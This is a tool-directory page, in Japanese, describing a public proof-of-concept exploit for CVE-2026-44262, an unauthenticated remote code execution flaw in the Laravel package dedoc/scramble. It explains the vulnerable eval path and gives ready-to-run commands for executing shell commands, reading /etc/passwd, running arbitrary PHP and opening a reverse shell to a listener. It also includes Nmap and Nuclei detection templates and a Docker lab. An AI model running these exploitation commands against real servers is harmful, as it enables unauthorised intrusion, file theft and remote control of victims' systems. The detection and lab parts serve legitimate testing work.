Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-44262 — dedoc/scrambleにおける未認証RCE — PoC、Nmap NSE、Nucleiテンプレート。 | Kitploit
ツール/GitHubGitHub/joshuavanderpoll/cve-2026-44262
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツールペイロード開発
GitHubjoshuavanderpoll/cve-2026-44262

CVE-2026-44262

dedoc/scrambleにおける未認証RCE — PoC、Nmap NSE、Nucleiテンプレート。

リポジトリを見る
23ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

dedoc/scramble RCE(CVE-2026-44262)PoC

Python Nmap NSE Nuclei Template

📜 説明

CVE-2026-44262 は、Laravel の API ドキュメント生成ツールである dedoc/scramble における、認証不要のリモートコード実行の脆弱性です。

NodeRulesEvaluator::doEvaluateExpression() は、eval("return $code;"); の実行前に extract($variables) を呼び出します。コントローラが $request->input() を $code という名前の変数に代入し、それをバリデーションルールとして使用する場合、Scramble はその変数を追跡して eval スコープに渡します。攻撃者は、細工したクエリパラメータを /docs/api.json に送信することで、$code を任意の PHP で上書きできます。

影響を受けるバージョン: dedoc/scramble >=0.13.2, <0.13.22

✨ 特徴

  • 自動検出 — OpenAPI 仕様をスキャンして、脆弱なパラメータを自動的に発見します
  • タイミングプローブ — sleep() を使用した安全で影響のないチェックで、eval が実行されることを確認します
  • コマンド実行 — シェルコマンドを実行し、HTTP レスポンスから直接出力を取得します
  • ファイル読み取り — ターゲットのファイルシステムから任意のファイルを読み取ります
  • PHP コード実行 — RCE を介して生の PHP コードを実行します
  • リバースシェル — PHP の proc_open によるリバースシェル。bash や busybox は不要です
  • 一括スキャン — ファイルから複数のターゲットをスキャンします
  • OS 検出 — Windows/Linux/Darwin を自動検出し、ペイロードを調整します
  • Nmap NSE — パッシブ + タイミング検出スクリプト(http-scramble-rce-detect.nse)
  • Nuclei テンプレート — タイミング確認による2段階検出(CVE-2026-44262.yaml)

🛠️ インストール

外部依存関係なし — Python 標準ライブラリのみを使用します。

macOS / Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com/docs/api

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com/docs/api

⚙️ 使用方法

root@kitploit:~
usage: CVE-2026-44262.py [-h] (--target TARGET | --targets FILE) [--docs-path PATH]
                   [--check] [--command CMD] [--code PHP] [--read-file PATH]
                   [--shell] [--lhost HOST] [--lport PORT] [--os OS]
                   [--useragent USERAGENT] [--timeout SECONDS]

検出

root@kitploit:~
# 完全な検出(タイミング + 実行プローブ)
python3 CVE-2026-44262.py --target http://example.com/docs/api

# 安全なチェックのみ — タイミングプローブのみ、コマンド実行なし
python3 CVE-2026-44262.py --target http://example.com/docs/api --check

# JSON エンドポイントパスを上書き
python3 CVE-2026-44262.py --target http://example.com/docs/api --docs-path /api/openapi.json

# 一括スキャン
python3 CVE-2026-44262.py --targets targets.txt

悪用

root@kitploit:~
# コマンドを実行
python3 CVE-2026-44262.py --target http://example.com/docs/api --command "whoami"

# ファイルを読み取る
python3 CVE-2026-44262.py --target http://example.com/docs/api --read-file /etc/passwd

# 生の PHP を実行
python3 CVE-2026-44262.py --target http://example.com/docs/api --code "echo php_uname();"

# リバースシェル(開始: nc -lv 4444)
python3 CVE-2026-44262.py --target http://example.com/docs/api --shell --lhost 172.17.0.1 --lport 4444

Nmap と Nuclei(パッシブ + タイミング、悪用なし)

root@kitploit:~
# Nmap
nmap -p 80,443 --script http-scramble-rce-detect example.com

# Nuclei
nuclei -t CVE-2026-44262.yaml -u http://example.com

🐋 Docker ラボ

脆弱なアプリ(dedoc/scramble v0.13.21)を含む自己完結型の Docker 環境が同梱されています。 詳細は docker/DOCKER.md を参照してください。

root@kitploit:~
cd docker/
docker compose up -d
python3 ../CVE-2026-44262.py --target http://localhost:8000/docs/api

🕵🏼 参考情報

  • dedoc/scramble
  • GitHub Advisory — GHSA-4rm2-28vj-fj39
  • NVD — CVE-2026-44262
  • HackIndex.io — CVE-2026-44262

📢 免責事項

このツールは教育および研究目的でのみ提供されています。作成者は、このツールの誤用または損害について一切の責任を負いません。

ツールをダウンロード